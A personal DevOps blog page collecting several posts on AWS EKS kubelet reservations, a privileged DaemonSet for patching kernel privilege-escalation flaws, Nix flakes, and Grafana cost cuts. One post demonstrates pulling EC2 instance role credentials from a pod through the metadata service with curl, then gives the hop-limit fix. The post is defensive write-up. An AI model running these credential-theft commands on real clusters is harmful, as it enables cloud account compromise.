Skip to content

2026

AWS EKS node system and kubelet resource reservation

It is well known that enabling prefix delegation on the CNI plugin/addon can drastically increase the node's pod limit. This post is about if and how AWS scales node system and kubelet resource reservation in general, and what happens when we tweak the kubelet's max-pods setting. The latter can be beneficial, because it was common that the node ran out of IPs long before any reasonable resource utilization was reached.

System resource reservation

This one is easy, because AWS EKS managed nodes simply don't have any system resources reserved out of the box. AWS documentation is really vague about setting it, but they write if you must set, you should only set it for un-compressable resources (memory).

Kubelet resource reservation

How the kubelet's resource reservation for CPU and memory scales with instance size is not widely known and is really interesting. Let's start with CPU, which in the calculation is independent of max-pods.

  • The scaling of reserved CPU for the kubelet is calculated as the sum of 6% of the first core, 1% of the second core, 0.5% of the third and fourth cores, and 0.25% of the remaining cores.

If we move on to memory, it is heavily dependent on max-pods.

  • The calculation of reserved memory is 255Mi + (11Mi * max_pods)

Each instance type in AWS has different defaults for max-pods, depending on available network interfaces, and is normally lower than the recommended upper limit of 110 pods.

Effect of tweaking max-pods

Now it becomes interesting: if I enable prefix delegation and set max-pods to 110, the kubelet reserved memory calculation still uses the much lower AWS default. So we have to do the calculation ourselves and set it accordingly, since AWS doesn't do it for us.

Thoughts on local privilege escalation vulnerabilities from a Kubernetes perspective

We have recently been hit by a wave of Linux kernel local privilege escalation vulnerabilities Copy Fail (CVE-2026-31431), Dirty Frag (CVE-2026-43284, CVE-2026-43500) and Fragnesia. While the situation isn't ideal and discovery frequency is likely driven by improvements in AI, temporary mitigations have been relatively simple. SSH into a Linux box and apply temporary mitigation or do a system security update if available and in some cases reboot afterwards. This can be done too for Kubernetes cluster nodes, but when node autoscaling enters the situation changes. So how do we handle temporary mitigations of Kubernetes cluster nodes until an official patched image is released, when we constantly get new ones and our temporarily patched nodes disappear?

Other options available

There are several paths to follow, some more passive than others. Let's go through some of the options. The most passive one is to do nothing and just wait for an upstream fix, in this case for AWS EKS, a new AMI release. I'm confident that this option is more popular than most people realises. Another less passive but manual approach is to temporarily patch the nodes, but as we already discussed this is probably not viable if node autoscaling is a thing. Here I'm also pretty sure that for many smaller clusters without node autoscaling this was the approach chosen. There are definitely other options such as building your own image or maybe patching via user data, but these require all existing nodes to be replaced, effectively leading to extra pod disruption. Plus user data is likely to touch Terraform/OpenTofu and in AWS also the launch template, giving developers slow feedback when testing.

My preferred option (so far)

The best approach I've seen so far is to deploy a DaemonSet with high privilege on all nodes and run your patches there. This of course adds an extra attack vector, which isn't ideal, but it is fast to develop and apply and doesn't touch the launch template, making iterations fast and lightweight. The example below is heavily inspired by an implementation provided by the Red Hat OpenShift team.

---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: privilege-escalation-patch
  namespace: kube-system

---
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: privilege-escalation-patch
  namespace: kube-system
  labels:
    app: privilege-escalation-patch
spec:
  selector:
    matchLabels:
      app: privilege-escalation-patch
  template:
    metadata:
      labels:
        app: privilege-escalation-patch
    spec:
      serviceAccountName: privilege-escalation-patch
      nodeSelector:
        kubernetes.io/os: linux
      tolerations:
        - operator: Exists
      terminationGracePeriodSeconds: 1
      containers:
        - name: privilege-escalation-patch
          image: debian:stable
          command:
            - /bin/sh
            - "-c"
            - |
              echo "YOUR PATCH SCRIPT GOES HERE"
              sleep infinity
          lifecycle:
            preStop:
              exec:
                command:
                  - /bin/sh
                  - "-c"
                  - |
                    echo "YOUR REMOVAL OF PATCH GOES HERE IF NEEDED"
          securityContext:
            privileged: true
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /

AWS EKS vulnerability

Before we start, I must clarify that there are no newly discovered 0‑Day vulnerabilities in this blog post, but rather a moment of clarity realizing how bad an already‑existing unpatched (N‑Day) vulnerability can be under certain circumstances.

The vulnerability discussed here is that AWS EKS clusters (Kubernetes) by default allow pods to steal worker node credentials. This is bad, but the patch is relatively simple with few side effects. I will take you through how the vulnerability is exploited, an example of what would amplify the impact, how it is patched, and examples of what potentially breaks.

The exploit

When spinning up an AWS EKS cluster, depending on the method used, your worker nodes might end up with a launch template configuration that has the default hop limit of 2. This means that pods are allowed to call the instance metadata service, because two network hops are allowed. The instance metadata service is what the EC2 instance (worker node) uses to get information about itself and its environment, including credentials, and this is where our exploit begins. Assuming that you can gain access to the cluster's pods or spin up new ones, be careful if following this example because the credentials, even though temporary, might end up in your logs.

# Spin up a new pod with an interactive shell
kubectl run -n default -i --tty --rm debug --image=alpine:latest --restart=Never -- sh

# Install curl
apk update && apk add curl

# Get a token from the metadata service
curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"

We have now obtained a token from the metadata service that can be used to retrieve the EC2 instance role name and its credentials. Continuing in the same pod as before.

# Get the EC2 instance role name
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Get the EC2 instance role credentials
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE

We have now obtained a valid set of AWS credentials with the same permission scope as your EC2 instance role.

The impact

It is very common for AWS EKS worker nodes to have access to pull container images or read data from SSM Parameter Store and probably more. In some environments where predictable naming patterns exist, decrypted access to certain secrets may still be possible even with limited list/describe permissions, which makes the impact more serious than initially expected. Some teams might prefer SSM Parameter Store for storing secrets over Secrets Manager, making the impact much worse.

The patch

To prevent pods from accessing the instance metadata service, set the EC2 instance metadata hop limit to 1 in your worker node launch templates. This blocks pod‑level IMDS access while keeping node‑level functionality intact. Be aware that some Kubernetes add‑ons or deployment tooling may rely on IMDS for cluster, network, or storage metadata. These components may need additional configuration, such as supplying explicit parameters or assigning dedicated IAM roles. The exact impact varies between setups, so it's important to evaluate this change in a non‑production environment first. Here are things I have discovered, but you might have more.

  • AWS Load Balancer Controller can no longer get the VPC ID, so we need to supply it.
  • EBS CSI driver will first attempt to call the metadata service for information, then fail, throwing an error and then falling back to getting it from Kubernetes instead.
  • Flux Image Reflector Controller can no longer pull images from ECR, so an IRSA role needs to be supplied.

Disclaimer: This example reflects a generic EKS configuration and is not indicative of any specific environment.

How this blog uses Nix

Nix is an advanced tool for building, packaging, and configuring software in a reliable, reproducible and declarative way, that has been gaining a lot of popularity over recent years. Nix first came up on my radar around the early 2020s, but it took a couple of years before I really started investing time on it other than just reading. It is really powerful but also very different from what I was used to. I now use NixOS as my daily driver (work and home) and use Nix Flakes to declare my development shells in various projects. In this post we will go over how I first started using Nix and how I have declared a development shell for this blog using Nix Flakes.

The word Nix is used everywhere

The term "I use Nix" can have many meanings and is sometimes confusing. Let's go over some of them here.

  • Nix the functional language
  • Nix the package manager also known as nixpkgs
  • Nix the operating system also known as NixOS

There are probably more, but I think this might illustrate where the confusion comes from. Just know that people tend to only use the word "Nix" and you have to guess the context.

Home-manager is a great place to start

I started my practical journey with Nix with porting my dotfiles and packages into the Nix ecosystem using Home-manager, a basic system for managing your user environment using the Nix package manager and Nix libraries. For me it was a great starting point and I can really recommend this approach. At that time I was using Archlinux, but Nix with home-manager could easily be set up on the side and I could slowly port my stuff when I felt like it. I also quickly found out that I almost don't have any system-level configuration, so I made the switch to NixOS after roughly a year and I have never looked back since. See my NixOS configuration here github.com/wcarlsen/config.

Flakes and development shells

Flakes have at this point basically become the defacto standard, when using Nix. It adds a much needed flake.lock file (can be updated with nix flake update), making sure your configuration is reproducable. It is pretty simple to define a development shell using flakes. See look at "minimal" example.

# flake.nix
{
  inputs = {
    nixpkgs.url = "github:nixos/nixpkgs/nixos-unstable";
    flake-utils.url = "github:numtide/flake-utils";
  };

  outputs = inputs:
    inputs.flake-utils.lib.eachDefaultSystem (system: let
      pkgs = import inputs.nixpkgs {
        inherit system;
      }; # this is just a fancy (but easy) way to define your system, e.g. x86_64-linux, aarch64_darwin, etc.
    in {
      devShells = {
        default = pkgs.mkShell {
          buildInputs = with pkgs; [
            cowsay # add your dependencies here
          ];
          shellHook = ``
            cowsay "COWABUNGA!" # add your custom shell hooks here
          ``;
        };
      };
    });
}

Above flake consists of inputs, defining which branch of the Nix package manager to use and flake-utils as a way to define systems. The other part is outputs, where we are outputting devShells, but only defining one called default using pkgs.mkShell and its attribute buildInputs to define package dependencies. It should be noted that mkShell has other attributes as well, for example shellHook. You could imagine a simple Python project using UV as package manager, where buildInputs would contain Python and UV and the shellHook running uv sync installing all Python-specific dependencies. Another example would be an Opentofu project, where we install all providers with tofu init in the shellHook.

The devShells can be invoked with the following nix command: nix develop. I tend to use direnv and just put use flake in my .envrc file, to have it automatically set up my development shell.

So how does this blog use Nix?

Now that we have some limited knowledge about Nix and Flakes, we can start looking at how this blog uses it. In the root of the GitHub project you will find a flake.nix which specifies MkDocs and all the plugins used to create this blog, and, because I use direnv, it will automatically install all dependencies and drop me into a development shell so I can start writing and validate my changes locally. I find the "holy trinity" flakes, direnv and make really useful. So now we have a reproducible development setup; how do we use it in places other than locally? Let's look at GitHub Actions as an example.

GitHub Actions and Flakes

Because we have defined all of our dependencies in a Flake it becomes really easy to utilize it in a GitHub Action.

name: build
on:
  pull_request:
    branches:
      - main
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install Nix
        uses: cachix/install-nix-action@v30
        with:
          extra_nix_config: |
            access-tokens = github.com=${{ secrets.GITHUB_TOKEN }}
      - name: Build
        run: nix develop --command make build

We see that it doesn't really require much effort at all, and changes to my local development don't require updates to my GitHub Actions workflow (unless I change the Makefile interface).

Cost savings Grafana Cloud follow up

In the previous post I wrote about our efforts reduce cost for Grafana Cloud metrics. Here I went over the 3 main things we implemented

  • Reduced sample rates
  • Filter/drop unused metrics (keep only used ones)
  • Enable adaptive metrics

but I also ended up concluding that we lacked impact feedback and only had proxy indicators. Our goal was ambitious and more concrete we set out to save 80% on our metrics bill. This post serves as a conclusion on our efforts.

Conclusion

We now know that we almost reached that goal with a 78% reduction in metrics cost alone.

Implementation aftermath

Enabling auto-mode for adaptive metrics was by far the most invasive and we saw some of the developers dashboards break, but also fewer than antisipated.